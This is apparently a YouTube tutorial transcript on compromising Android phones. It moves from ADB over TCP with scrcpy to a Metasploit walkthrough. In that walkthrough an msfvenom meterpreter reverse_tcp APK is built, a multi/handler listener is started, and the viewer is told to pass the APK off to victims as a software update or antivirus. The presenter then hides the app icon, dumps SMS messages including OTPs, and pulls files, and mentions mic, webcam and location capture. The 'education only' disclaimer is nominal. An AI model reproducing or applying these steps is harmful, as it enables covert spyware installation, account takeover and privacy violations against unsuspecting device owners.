What's up guys and welcome back to the YouTube video. In today's video, I am going to show you different methods to hack into an Android device. So this video is only for complete education purpose only. Make sure that you don't hack into your relatives and friends Android device and get into some kind of trouble. So with that being said, let's get started. So if you are into Android hacking and remotely controlling them, the first tool you need in your arsenal will be ADB and SCRCPY, which are basically used for remotely controlling and accessing an Android device. So this is not actually a hack, but it's an official feature of an Android device to debugging purposes, and I am going to exploit this to gain access to my own Android device. So first of all, let's get started by installing ADB and SCRCPY on your Linux machine. So it will be preferable to have Kali Linux installed for hacking purposes. So if you have another Linux distro like Ubuntu and all, it is also fine to go with that. So with that being said, let's start our terminal and install ADB. So let me just zoom in. Sudo apt get install. It's already installed for me, and now I can install SCRCPY. SCRCPY, and there we are. We are good to go. ADB and SCRCPY is already installed on my system. So first of all, to get started with ADB and SCRCPY, grab your Android phone and go to settings, about phone section, and press your version number for 3 to 4 times, 3 steps, and after a couple of times it'll show that you are a developer. So just go to advanced settings and you will see developer options there. Go into that and you can see a USB debugging option there. Just toggle it on and it will actually warn you for that. So after plugging your device in, you have to fire up a terminal, and let me just zoom in a little bit and type in ADB devices, and it will actually show the devices, available devices attached to your computer. Now type in ADB TCP IP 5555. What this does is that it will actually open a port for listening for ADB connections over the port 5555. Clicking that enter, it will say restarting TCP port mode. So that's set. Now just unplug the device from your computer and just go ahead and find out the IP address of the Android device and just connect to it. Connect. Okay, and you can see it's connected, and I can. It's not actually connected anywhere, and I'm going to remotely control my Android device. So just type in SCRCPY, press enter, and let me just close this one here. Okay, you can see that it's actually wireless, and I can actually control it using my mouse here. See, I can just control using my mouse. So let me just open up a new terminal here real quick, zoom in, and just type in ADB, and you can see that there's a ton of commands you can just actually do to this Android device wirelessly. So I can actually install, delete an application, delete a file, push a file, pull a file, and you can actually whatnot, you can do whatever things using ADB and SCRCPY.
Method number 2 will be Metasploit-Framework. Later in the video, you have seen that using ADB and SCRCPY, you can actually control and access a device, an Android device within your reach or within your local area network, right? So this is where real hacking comes in. Metasploit-Framework gives access through the internet without touching the device. You can have the control over the device. Just send the payload by saying it's a software update, or it's an antivirus or something, and the user or the victim will install and you can have access over the Android device. So for getting started with Metasploit framework, you have to first install, right? So if you are on Kali Linux, it will be already installed, so you don't have to install anything. So if you are on another Linux distro, just type in sudo apt get install get install Metasploit-Framework. Framework will just do it for you. So if you are on Kali Linux, it's already installed, so you don't have any trouble. So just type in msf venom. When it gets to that, there is a couple of commands you can do with this, but I am only interested in Android payload. So before doing that, let me just fire up my Ehacking server. So you know that this is hacking us over internet, so I have to create an Ehacking server. So I can start up Ehacking TCP on my port 0444. So let's just start up. Just make it a bit smaller. And you can see that there's an IP address over here which I'm interested in. So this will be our public address for our application. So I'm just going to create msfvenom -p android/meter/reverse_tcp. The L host will be our IP address which we have. Right, so it will be our Ehacking server address, and the L port will be our Ehacking server I port. So it will be 14793. L port will be 14793. Then we have to write the file to and file named android.apk. So press enter. And it will actually take a 4 to 5 seconds to create an Android APK. Perfect. Now you can see that. We just press ls. You can see Android APK is already here. So you just type in SCRCPY and open up my victim over here. There we are. My victim is already set up and complete. And we just open up. So my victim is already here, so let me just go ahead and create a new tab using ADB, ADB install, android.apk, oops, apk, press enter, performing stream install, and install anyway. The device knows that it's a malicious apk and it is warning me. Don't send please. Okay. Perfect, now we have our application installed. So now we have to start up the MSF console for have the access to MSF console. It will take about 2 to 3 seconds to start up MSF console. Perfect, now we are in, and you can see that this is Metasploit framework console open here, right here. Now we have to start use exploit, oops, exploit/multi handler, and you have to set payload to android/meter/reverse_tcp. Press enter, and you can just ask for show options if you don't know whatever options you had to fill out. Now you have to pass on the L host you are working with. So set L host to be our IP, which is 127.0.0.1. Recall that we are actually forwarding the Ehacking port to our local IP, right? So press enter, the L host setup. So now just type in exploit, press enter, and it is started reverse TCP handler on the port. Perfect. Now let me just go ahead and open the application. It will have access, and just continue. And okay, and you can see that sending stage bytes to 107.0.0.1. Now you can see that we have the access to the Android device. Let me just type in help, and you can see that whatever things we can actually do it remotely, right? Okay, just first of all, let me hide the app icon, right? Hide app icon. Okay, perfect. Now the user will not know even if there was an application there, right? Now let me just go ahead and let me just get the SMS list of this guy. Dump SMS. Yes, we have fetched 927 SMS through the internet of this device. Let me just go ahead and open the file manager. So you see that? You can see that SMS dump. Okay, here we are. We have every file, every SMS of that person, including the OTP list. Easy. Now, let me just go ahead and do another thing. Let me just pull a file from this guy's phone. So now let me just open up the shell and see the directory inside the phone. So cd to slash sd card slash cd sd card, and let me just ls, and you can see the we are inside the Android device, right? Let me just pull a image file from this phone. Exit. Download slash this file. It's downloading now, and voila, we have got the file. Let me just open up the file manager and see the image. Here we are. This is the image inside the phone, and we have wonderful things actually we can do with this. I should get contact list, geolocate, record mic, record webcam, like record screenshot, and we can do create new directory, remove directory, uninstall application, etc, etc. So that's pretty much about Metasploit framework.
Well, that's it. Make sure you subscribe to the channel, and if this video gets sufficient subscription and likes, I will definitely do another video where I am going to hack an Android device completely remotely. So until then, ciao.